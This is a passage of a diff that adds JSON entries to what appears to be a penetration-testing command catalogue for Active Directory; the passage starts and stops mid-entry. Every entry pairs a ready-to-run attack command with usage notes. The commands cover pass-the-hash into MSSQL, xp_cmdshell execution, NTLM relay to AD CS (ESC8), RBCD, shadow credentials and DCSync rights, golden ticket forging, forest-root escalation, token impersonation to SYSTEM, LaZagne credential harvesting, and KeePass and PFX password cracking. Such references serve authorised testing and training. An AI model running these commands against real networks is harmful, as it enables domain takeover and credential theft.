"Lateral Movement", + "Enumeration" + ], + "nativeCategory": [ + "Lateral Movement", + "Enumeration" + ], + "command": "# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth", + "description": "mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server", + "https://www.thehacker.recipes/ad/movement/mssql" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-MSSQLClient-XPCmdShell", + "toolId": "wadcoms:Impacket-mssqlclient", + "toolName": "Impacket-mssqlclient", + "name": "Impacket-MSSQLClient-XPCmdShell", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Execution", + "Privilege Escalation" + ], + "nativeCategory": [ + "Exploitation", + "PrivEsc" + ], + "command": "mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell", + "description": "Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "MSSQL" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server", + "https://www.thehacker.recipes/ad/movement/mssql/execution" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-AddComputer", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-AddComputer", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Execution", + "Persistence" + ], + "nativeCategory": [ + "Exploitation", + "Persistence" + ], + "command": "# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'", + "description": "Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota", + "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-DumpLAPS-ADCS", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Discovery", + "Credential Access", + "Enumeration" + ], + "nativeCategory": [ + "Discovery", + "Credential Access", + "Enumeration" + ], + "command": "# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs", + "description": "Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "LDAP", + "ADCS" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://www.thehacker.recipes/ad/movement/ntlm/relay", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/laps" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-ESC8-ADCS", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-ESC8-ADCS", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Credential Access", + "Exploitation" + ], + "command": "# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController", + "description": "Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "ADCS" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://posts.specterops.io/certified-pre-owned-d95910965cd2", + "https://www.thehacker.recipes/ad/movement/adcs/relay" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-EscalateUser", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-EscalateUser", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john", + "description": "Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: john", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://www.thehacker.recipes/ad/movement/ntlm/relay", + "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-Interactive", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-Interactive", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Lateral Movement", + "Collection", + "Execution" + ], + "nativeCategory": [ + "Lateral Movement", + "Collection", + "Exploitation" + ], + "command": "# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000", + "description": "Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "SMB" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://www.thehacker.recipes/ad/movement/ntlm/relay", + "https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-RBCD", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-RBCD", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Execution", + "Privilege Escalation" + ], + "nativeCategory": [ + "Exploitation", + "PrivEsc" + ], + "command": "# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access", + "description": "Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-NTLMRelayX-ShadowCredentials", + "toolId": "wadcoms:Impacket-ntlmrelayx", + "toolName": "Impacket-ntlmrelayx", + "name": "Impacket-NTLMRelayX-ShadowCredentials", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Persistence", + "Credential Access", + "Execution" + ], + "nativeCategory": [ + "Persistence", + "Credential Access", + "Exploitation" + ], + "command": "# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'", + "description": "Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$", + "mitre": [], + "requires": [ + "No_Creds" + ], + "services": [ + "NTLM", + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py", + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-owneredit", + "toolId": "wadcoms:Impacket-owneredit", + "toolName": "Impacket-owneredit", + "name": "Impacket-owneredit", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Execution", + "Persistence" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation", + "Persistence" + ], + "command": "# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'", + "description": "Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://www.thehacker.recipes/ad/movement/dacl/grant-ownership", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-RaiseChild", + "toolId": "wadcoms:Impacket-raiseChild", + "toolName": "Impacket-raiseChild", + "name": "Impacket-RaiseChild", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Privilege Escalation", + "Lateral Movement", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Lateral Movement", + "Exploitation" + ], + "command": "# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123", + "description": "Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123", + "mitre": [], + "requires": [ + "Username", + "Password" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-TicketConverter", + "toolId": "wadcoms:Impacket-ticketConverter", + "toolName": "Impacket-ticketConverter", + "name": "Impacket-TicketConverter", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Collection", + "Defense Evasion" + ], + "nativeCategory": [ + "Collection", + "Defense Evasion" + ], + "command": "# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi", + "description": "Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache", + "mitre": [], + "requires": [ + "TGT" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket", + "https://www.thehacker.recipes/ad/movement/kerberos/ptt" + ], + "added": true + }, + { + "id": "wadcoms:Impacket-Ticketer-AES", + "toolId": "wadcoms:Impacket-ticketer", + "toolName": "Impacket-ticketer", + "name": "Impacket-Ticketer-AES", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Persistence", + "Execution" + ], + "nativeCategory": [ + "Persistence", + "Exploitation" + ], + "command": "# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache", + "description": "Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator", + "mitre": [ + "T1558.001" + ], + "requires": [ + "AES_Key" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/fortra/impacket", + "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket", + "https://attack.mitre.org/techniques/T1558/001/" + ], + "added": true + }, + { + "id": "wadcoms:John-keepass2john", + "toolId": "wadcoms:John", + "toolName": "John", + "name": "John-keepass2john", + "source": "DAEMON", + "platform": [ + "Linux" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt", + "description": "KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1555.005" + ], + "requires": [ + "No_Creds" + ], + "references": [ + "https://github.com/openwall/john", + "https://hashcat.net/wiki/doku.php?id=example_hashes", + "https://attack.mitre.org/techniques/T1555/005/" + ], + "added": true + }, + { + "id": "wadcoms:John-pfx2john", + "toolId": "wadcoms:John", + "toolName": "John", + "name": "John-pfx2john", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt", + "description": "A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt", + "mitre": [ + "T1110.002" + ], + "requires": [ + "No_Creds" + ], + "services": [ + "ADCS" + ], + "references": [ + "https://github.com/openwall/john", + "https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate", + "https://attack.mitre.org/techniques/T1110/002/" + ], + "added": true + }, + { + "id": "wadcoms:JuicyPotatoNG-SeImpersonate", + "toolId": "wadcoms:JuicyPotatoNG", + "toolName": "JuicyPotatoNG", + "name": "JuicyPotatoNG-SeImpersonate", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "PrivEsc", + "Exploitation" + ], + "command": "# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999", + "description": "JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999", + "mitre": [], + "requires": [ + "Shell" + ], + "services": [ + "DCOM" + ], + "references": [ + "https://github.com/antonioCoco/JuicyPotatoNG", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato" + ], + "added": true + }, + { + "id": "wadcoms:Krbrelayx-Unconstrained-TGT", + "toolId": "wadcoms:Krbrelayx", + "toolName": "Krbrelayx", + "name": "Krbrelayx-Unconstrained-TGT", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Credential Access", + "Privilege Escalation", + "Execution" + ], + "nativeCategory": [ + "Credential Access", + "PrivEsc", + "Exploitation" + ], + "command": "# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache", + "description": "krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache", + "mitre": [], + "requires": [ + "AES_Key" + ], + "services": [ + "Kerberos" + ], + "references": [ + "https://github.com/dirkjanm/krbrelayx", + "https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained" + ], + "added": true + }, + { + "id": "wadcoms:LaZagne-All", + "toolId": "wadcoms:LaZagne", + "toolName": "LaZagne", + "name": "LaZagne-All", + "source": "DAEMON", + "platform": [ + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "laZagne.exe all", + "description": "LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)", + "mitre": [ + "T1555" + ], + "requires": [ + "Shell" + ], + "services": [ + "NTLM" + ], + "references": [ + "https://github.com/AlessandroZ/LaZagne", + "https://book.hacktricks.xyz/windows-hardening/stealing-credentials", + "https://attack.mitre.org/techniques/T1555/" + ], + "added": true + }, + { + "id": "wadcoms:ldapdomaindump-Enum", + "toolId": "wadcoms:ldapdomaindump", + "toolName": "ldapdomaindump", + "name": "ldapdomaindump-Enum", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1", + "description": "ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1", + "mitre": [ + "T1087.002" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/dirkjanm/ldapdomaindump", + "https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap", + "https://attack.mitre.org/techniques/T1087/002/" + ], + "added": true + }, + { + "id": "wadcoms:ldapnomnom-UserEnum", + "toolId": "wadcoms:ldapnomnom", + "toolName": "ldapnomnom", + "name": "ldapnomnom-UserEnum", + "source": "DAEMON", + "platform": [ + "Linux", + "Windows", + "ActiveDirectory" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local", + "description": "ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local", + "mitre": [ + "T1087.002" + ], + "requires": [ + "No_Creds" + ], + "services": [ + "LDAP", + "Kerberos" + ], + "references": [ + "https://github.com/lkarlslund/ldapnomnom", + "https://attack.mitre.org/techniques/T1087/002/" + ], + "added": true + }, + { + "id": "wadcoms:ldeep-Enum-All", + "toolId": "wadcoms:ldeep", + "toolName": "ldeep", + "name": "ldeep-Enum-All", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Enumeration", + "Discovery" + ], + "nativeCategory": [ + "Enumeration", + "Discovery" + ], + "command": "# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output", + "description": "ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1", + "mitre": [ + "T1087.002" + ], + "requires": [ + "Username", + "Password" + ], + "services": [ + "LDAP" + ], + "references": [ + "https://github.com/franc-pentest/ldeep", + "https://www.hackingarticles.in/active-directory-enumeration-ldeep/", + "https://attack.mitre.org/techniques/T1087/002/" + ], + "added": true + }, + { + "id": "wadcoms:MANSPIDER-Content-Search", + "toolId": "wadcoms:MANSPIDER", + "toolName": "MANSPIDER", + "name": "MANSPIDER-Content-Search", + "source": "DAEMON", + "platform": [ + "Linux", + "ActiveDirectory", + "Windows" + ], + "capability": [ + "Collection", + "Credential Access", + "Discovery" + ], + "nativeCategory": [ + "Collection", + "Credential Access", + "Discovery" + ], + "command": "# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local", + "description": "MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more 